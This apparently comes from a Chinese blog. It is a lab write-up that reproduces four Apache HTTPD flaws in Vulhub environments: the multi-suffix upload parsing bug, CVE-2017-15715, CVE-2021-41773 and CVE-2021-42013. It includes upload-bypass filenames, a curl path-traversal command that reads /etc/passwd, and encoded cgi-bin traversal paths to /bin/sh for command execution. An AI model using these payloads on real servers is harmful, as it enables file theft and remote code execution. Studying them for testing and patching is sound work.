Apache HTTPD 漏洞复现

文章目录

  • [Apache HTTPD 漏洞复现](#Apache HTTPD 漏洞复现)
    • [1. Apache HTTPD 多后缀解析漏洞](#1. Apache HTTPD 多后缀解析漏洞)
      • [1.1 漏洞描述](#1.1 漏洞描述)
      • [1.2 漏洞复现](#1.2 漏洞复现)
      • [1.3 漏洞利用](#1.3 漏洞利用)
      • [1.4 获取GetShell](#1.4 获取GetShell)
    • [2. Apache HTTPD 换行解析漏洞-CVE-2017-15715](#2. Apache HTTPD 换行解析漏洞-CVE-2017-15715)
      • [2.1 漏洞描述](#2.1 漏洞描述)
      • [2.2 漏洞复现](#2.2 漏洞复现)
      • [2.3 漏洞利用](#2.3 漏洞利用)
    • [3. Apache HTTP Server_2.4.49 路径遍历和文件泄露漏洞-CVE-2021-41773](#3. Apache HTTP Server_2.4.49 路径遍历和文件泄露漏洞-CVE-2021-41773)
      • [3.1 漏洞描述](#3.1 漏洞描述)
      • [3.2 漏洞复现](#3.2 漏洞复现)
      • [3.3 漏洞利用](#3.3 漏洞利用)
    • [4. Apache HTTP 服务器 2.4.50 中的路径遍历和文件泄露漏洞-CVE-2021-42013](#4. Apache HTTP 服务器 2.4.50 中的路径遍历和文件泄露漏洞-CVE-2021-42013)
      • [4.1 漏洞描述](#4.1 漏洞描述)
      • [4.2 漏洞复现](#4.2 漏洞复现)
      • [4.3 漏洞利用](#4.3 漏洞利用)

Apache HTTPD 漏洞复现

1. Apache HTTPD 多后缀解析漏洞

链接地址:Vulhub - Docker-Compose file for vulnerability environment

1.1 漏洞描述

说明 内容
漏洞编号
漏洞名称 Apache HTTPD 多后缀解析漏洞
漏洞评级 高危
漏洞描述 在有多个后缀的情况下,只要一个文件含有.php后缀的文件即将被识别成PHP文件,没必要是最后一个后缀。利用这个特性,将会造成一个可以绕过上传白名单的解析漏洞。
修复方案 打补丁,上设备,升级组件

1.2 漏洞复现

环境启动

访问80端口

1.3 漏洞利用

环境运行起来后访问页面,上传一个文件

显示上传不支持的文件类型

我们可以将文件的后缀名修改为.png的格式来进行上传

显示上传成功,并且显示出来所上传文件的路径。

访问http://your-ip/uploadfiles/wuhu.php.png即可,发现phpinfo被执行了,该文件被解析为php脚本。

http://your-ip/index.php中是一个白名单检查文件后缀的上传组件,上传完成后并未重命名。我们可以通过上传文件名为xxx.php.jpgxxx.php.pngxxx.php.jpeg的文件,利用Apache解析漏洞可以进行getshell。

1.4 获取GetShell

漏洞原因

遇到以.php结尾的文件名后缀,就将其作为php文件执行。也就是所说只要文件后缀名中包含php就将其作为php脚本来执行。

2. Apache HTTPD 换行解析漏洞-CVE-2017-15715

链接地址:Vulhub - Docker-Compose file for vulnerability environment

2.1 漏洞描述

说明 内容
漏洞编号 CVE-2017-15715
漏洞名称 Apache HTTPD 换行解析漏洞
漏洞评级 高危
影响范围 2.4.0~2.4.29
漏洞描述 Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。
修复方案 打补丁,上设备,升级组件

2.2 漏洞复现

环境启动

启动后Apache运行在http://your-ip:8080

2.3 漏洞利用

上传一个名为wuhu.php的文件,被拦截:

使用bp抓包查看

先在wuhu.php后面添加一个点,然后修改其十六进制编码形式。

在wuhu.php后面插入一个\x0A(注意,不能是\x0D\x0A,只能是一个\x0A),不再拦截:

然后发包即可

浏览器访问刚才上传的/wuhu.php%0a,发现能够成功解析,但这个文件不是php后缀,说明目标存在解析漏洞:

3. Apache HTTP Server_2.4.49 路径遍历和文件泄露漏洞-CVE-2021-41773

链接地址:Apache HTTP 服务器 2.4.49 中的路径遍历和文件泄露漏洞 (CVE-2021-41773)

3.1 漏洞描述

说明 内容
漏洞编号 CVE-2021-41773
漏洞名称 Apache HTTP 服务器 2.4.49 中的路径遍历和文件泄露漏洞
漏洞评级 高危
影响范围 2.4.49-2.4.50
漏洞描述 在 Apache HTTP Server 2.4.49 中对路径规范化所做的更改中发现一个缺陷。攻击者可以使用路径遍历攻击将 URL 映射到预期文档根目录之外的文件。如果这些目录之外的文件不受通常的默认配置"要求全部拒绝"的保护,则这些请求可以成功。如果还为这些别名路径启用了 CGI 脚本,则可能允许远程执行代码。
修复方案 打补丁,上设备,升级组件

3.2 漏洞复现

环境启动

服务器启动后,您通过 .It works!http://your-ip:8080访问页面。

3.3 漏洞利用

一个简单的 CURL 命令来重现漏洞(请注意,必须是现有目录):/icons/

使用bp抓取数据包,然后修改即可。

复制代码
curl -v --path-as-is http://your-ip:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

在服务器上启用 mods cgi 或 cgid 后,此路径遍历漏洞将允许任意命令执行:

复制代码
cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh

4. Apache HTTP 服务器 2.4.50 中的路径遍历和文件泄露漏洞-CVE-2021-42013

链接地址:Vulhub - 用于漏洞环境的 Docker-Compose 文件

4.1 漏洞描述

说明 内容
漏洞编号 CVE-2021-42013
漏洞名称 Apache HTTP 服务器 2.4.50 中的路径遍历和文件泄露漏洞
漏洞评级 高危
影响范围 2.4.49~2.4.50
漏洞描述 CVE-2021-42013 是一个漏洞,由 CVE-2021-41773修复不完整导致,攻击者可以使用路径遍历攻击将 URL 映射到类别名指令配置的目录之外的文件。
修复方案 打补丁,上设备,升级组件

4.2 漏洞复现

环境启动

4.3 漏洞利用

Apache HTTP 服务器 2.4.50 修补了以前的 CVE-2021-41773 有效负载,例如 ,但它不完整。

使用bp抓取数据包,然后修改即可。

绕过修补程序(请注意,必须是现有目录):.%%32%65``/icons/

复制代码
/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd

在服务器上启用 mods cgi 或 cgid 后,此路径遍历漏洞将允许任意命令执行:

复制代码
cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh
相关推荐
m0_738120721 小时前
玄机——某学校系统中挖矿病毒应急排查
网络·安全·web安全
帽儿山的枪手2 小时前
为什么Linux需要3种NAT地址转换?一探究竟
linux·网络协议·安全
leagsoft_10039 天前
联软科技入选《新质·中国数字安全百强(2025)》专业领域榜单,斩获“领先者”称号
科技·安全
浩浩测试一下9 天前
渗透测试指南(CS&&MSF):Windows 与 Linux 系统中的日志与文件痕迹清理
linux·运维·windows·安全·web安全·网络安全·系统安全
安全系统学习9 天前
【网络安全】DNS 域原理、危害及防御
算法·安全·web安全·网络安全·哈希算法
二闹9 天前
擂台赛:图形老将 VS 短信新秀,谁更抗揍?
javascript·后端·安全
ALe要立志成为web糕手9 天前
Kubernetes安全
安全·web安全·网络安全·k8s·云安全
2501_915921439 天前
后台发热、掉电严重?iOS 应用性能问题实战分析全过程
websocket·网络协议·tcp/ip·http·网络安全·https·udp
DeepPhish9 天前
【钓鱼预警】针对跨境销售投递Tesla间谍木马
网络安全·钓鱼邮件·安全意识·eml分析·反钓鱼
mooyuan天天9 天前
pikachu靶场通关笔记44 SSRF关卡02-file_get_content(三种方法渗透)
网络·安全·web安全·ssrf·ssrf漏洞